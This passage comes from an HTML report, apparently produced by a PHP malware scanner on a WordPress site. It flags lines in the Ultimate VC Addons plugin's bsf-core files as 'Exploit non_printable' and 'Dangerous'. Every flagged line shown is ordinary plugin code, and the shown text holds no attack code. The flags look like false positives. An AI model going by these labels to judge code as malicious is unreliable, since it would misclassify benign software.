</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_update_all_product_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 371</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_all_product_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_current_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_current_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$template</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_generate_rand_token' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 505</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_current_name' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 509</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_current_name</span><span style="color: #007700">( </span><span style="color: #0000BB">$template</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_notices' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_notices</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_generate_rand_token</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 633</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_free_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 634</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_free_products</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_free_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 685</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_theme_deactivation' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_theme_deactivation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 698</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_free_menu_position' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 699</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_free_menu_position</span><span style="color: #007700">( </span><span style="color: #0000BB">$start</span><span style="color: #007700">, </span><span style="color: #0000BB">$increment </span><span style="color: #007700">= </span><span style="color: #0000BB">0.3 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 705</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$start</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 716</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 721</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( isset( </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] ) ) ? </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 725</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_update_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 726</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 729</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">update_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_options'</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_options </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 734</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_sort' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_sort</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">strcmp</span><span style="color: #007700">( </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">-></span><span style="color: #0000BB">short_name </span><span style="color: #007700">), </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">$b</span><span style="color: #007700">-></span><span style="color: #0000BB">short_name </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 748</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstorm_switch' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_switch</span><span style="color: #007700">( </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$default </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$switch</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 775</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'update_bsf_core_options_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 777</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_bsf_core_options_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_364").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/auto-update/updater.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_365" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arrs</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 188</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_bsf_product_upgrade_link' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_product_upgrade_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$product </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$link</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">with unique plugins</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_array_unique' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 257</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_array_unique</span><span style="color: #007700">( </span><span style="color: #0000BB">$arrs </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arrs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">wp_remote_get</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">updated_versions</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_remote_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">-></span><span style="color: #0000BB">error</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_check_product_update' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_check_product_update</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_remote_version</span><span style="color: #007700">( </span><span style="color: #0000BB">$products </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_365").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/auto-update/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 35.04 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_366" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function () { $(</span><span style="color: #0000BB">tab</span><span style="color: #007700">).</span><span style="color: #0000BB">fadeIn</span><span style="color: #007700">(</span><span style="color: #0000BB">200</span><span style="color: #007700">); }, </span><span style="color: #0000BB">200</span><span style="color: #007700">); }); </span><span style="color: #FF8000">// end of tabs functionality }); })(jQuery); </script></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">i</span><span style="color: #007700">, </span><span style="color: #0000BB">input</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">response</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 170</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
